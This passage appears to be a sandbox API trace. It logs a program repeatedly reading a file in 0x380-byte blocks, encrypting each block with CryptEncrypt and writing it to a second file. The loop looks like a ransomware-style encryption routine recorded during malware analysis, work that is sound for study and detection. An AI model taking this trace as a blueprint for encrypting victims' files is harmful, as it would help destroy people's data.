lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.404] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.404] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.404] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.404] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.404] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.404] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.404] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.404] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.405] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.405] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.405] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.405] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.405] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.405] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.405] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.405] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.406] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.406] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.406] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.406] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.406] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.406] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.406] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.406] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.406] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.407] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.407] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.407] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.407] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.407] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.407] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.407] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.407] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.407] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.407] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.407] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.408] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.408] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.408] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.408] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.408] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.408] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.408] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.408] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.408] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.408] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.408] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.408] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.408] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.409] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.409] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.409] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.409] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.409] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.409] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.409] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.409] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.409] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.410] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.410] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.410] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.410] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.410] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.410] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.410] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.410] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.410] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.410] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.411] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.411] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.411] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.411] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.411] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.411] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.411] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.411] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.411] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.411] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.412] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.412] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.412] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c190*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.412] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c190*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c190*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.412] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c190, nNumberOfBytesToRead=0x380, 